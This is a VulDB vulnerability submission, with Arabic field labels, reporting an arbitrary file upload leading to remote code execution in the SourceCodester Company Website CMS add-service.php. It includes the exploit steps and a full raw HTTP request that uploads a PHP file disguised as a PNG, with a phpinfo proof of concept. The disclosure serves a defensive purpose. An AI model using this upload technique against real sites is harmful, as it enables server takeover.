| عنوان | Company Website CMS Backstage management add-service RCE |
|---|
| الوصف | info:There is an arbitrary file upload vulnerability in the company's website CMS background management add-service
Add a service in the background, upload attachments, capture packages, and modify the attachment suffix to php as needed.
Modify the attached content php code getshell to achieve RCE.
Then traverse the URL:/dashboard/uploads/services/xxxxx.php access
payload:POST /dashboard/add-service.php HTTP/1.1
Host: 192.168.153.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------274725611819867486771627854568
Content-Length: 783
Origin: http://192.168.153.1:8090
Connection: close
Referer: http://192.168.153.1:8090/dashboard/add-service.php
Cookie: PHPSESSID=vomi3si61qo6kdmeg950fo9uk2
Upgrade-Insecure-Requests: 1
-----------------------------274725611819867486771627854568
Content-Disposition: form-data; name="service_title"
11111111111111111111111111
-----------------------------274725611819867486771627854568
Content-Disposition: form-data; name="service_desc"
11111111111111111111111111
-----------------------------274725611819867486771627854568
Content-Disposition: form-data; name="service_detail"
11111111111111111111111111
-----------------------------274725611819867486771627854568
Content-Disposition: form-data; name="ufile"; filename="123.php"
Content-Type: image/png
<?php phpinfo();?>
-----------------------------274725611819867486771627854568
Content-Disposition: form-data; name="save"
-----------------------------274725611819867486771627854568--
|
|---|
| المصدر | ⚠️ https:// www.sourcecodester.com/php/15517/company-website-cms-php.html |
|---|
| المستخدم | jsbae3449 (UID 30775) |
|---|
| ارسال | 09/08/2022 07:35 PM (4 سنوات منذ) |
|---|
| الاعتدال | 10/08/2022 08:12 AM (13 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 206022 [SourceCodester Company Website CMS Add Service add-service.php تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|